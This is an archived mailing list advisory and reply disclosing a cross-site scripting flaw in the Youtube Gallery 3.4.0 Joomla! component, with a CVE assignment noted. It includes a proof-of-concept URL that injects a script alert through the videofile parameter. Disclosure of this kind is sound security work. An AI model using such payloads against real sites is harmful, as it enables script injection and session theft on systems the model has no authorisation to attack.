Mailing List Archive

XSS Vulnerability in the Youtube Gallery 3.4.0 Component
Hello,

Cross-site
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web
script or HTML via the videofile parameter to /includes/flvthumbnail.php.

POC:
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script>
Re: XSS Vulnerability in the Youtube Gallery 3.4.0 Component [ In reply to ]
The CVE-2013-5956 has been assigned for this vulnerability.


Best Regards.




On Saturday, March 15, 2014 2:07 PM, Mahmoud Ghorbanzadeh <mdgh9@yahoo.com> wrote:

Hello,

Cross-site
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web
script or HTML via the videofile parameter to /includes/flvthumbnail.php.

POC:
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script>